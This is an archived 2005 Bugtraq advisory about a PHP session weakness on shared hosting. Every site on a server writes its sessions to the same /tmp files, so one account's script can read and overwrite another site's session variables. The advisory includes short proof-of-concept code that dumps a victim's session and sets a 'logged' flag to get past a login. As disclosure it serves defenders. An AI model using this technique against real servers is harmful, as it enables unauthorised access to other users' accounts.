lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050916100352.30207.qmail@securityfocus.com>
Date: 16 Sep 2005 10:03:52 -0000
From: unknow@...team.org
To: bugtraq@...urityfocus.com
Subject: PHP SESSION MODIFICATION


-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP SESSION
Version: tested on 3.x and 4.x
Homepage: http://php.net/

Authors: unknow (from uw-team) and adam_i
Date: 16 September 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

In PHP You can define a session variable by this code:

------------------------
start_sesion();
$my_var='foo';
session_register('my_var');
------------------------

This is 'very safe' method to keep secret data, because
data witch was send by get, post or cookie method could
be modified by user.
But... session variable could be also modified!
Only in 'specific environment', but it is possible.

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
                   HOW IT WORKS?
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

PHP save all session variables in file:
/tmp/sess_$id

The variable "$id" is random and it's usually saved in
cookie named 'PHPSESSID' or it is added to URL.
User don't know what kind of variables are declared
in session.

It's very important, that PHP give ONE 'id' per ONE user.
Thats mean that, when you enter site:
www.example.com/account1/
You will have THE SAME 'id' number like on this site:
www.example.com/account2/

So... all data from 'account1' and 'account2' are saved in
THE SAME file: /tmp/sess_$id

Thats mean:
When 'account1' sets variable $name='Been', 'Account2' will
see this variable, and could read, and write to it, because
all data are stored in the same file, and PHP doesn'a know
who is a owner of specified data.


-- == -- == -- == -- == -- == -- == -- == -- == -- == --
                       USAGE
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

You need:
- a victim :P
- www account at the same server like victim

Victim code:
------------------------
session_start();
if (!session_is_registered("logged")) {
$logged=0;
}
if ($login=='s3cr3t') {$logged=1;}
session_register('logged');
if ($_SESSION['logged']==1){ see_my_secret_file(); }
------------------------

Look realy safe!
But we have this code on the same machine, but on the other account:

Hacker code:
------------------------
session_start();
var_export($_SESSION);
------------------------

We must do something like this:

1) enter this site:
http://[victim-host]/[victim]/file.php
2) run this file:
http://[victim-host]/[hacer-account]/hacker.php

We would see something like this on the hacker page:

------------------------
array ( 'logged' => 0, )
------------------------

Now we know that victim use '$logged' variable to recognize us.

Now we must edit hacker file, and write this code:

------------------------
session_start();
$_SESSION['logged']=1;
------------------------

now we run 'hacker.php' file on hacker account and refresh victim page.
Now we are logged in!

Contact:

Author: unknow (from uw-team) and adam_i
Location: Poland
Email: unknow <at> uw-team <dot> org || adam__i <at> o2 <dot>pl
HP: http://www.uw-team.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ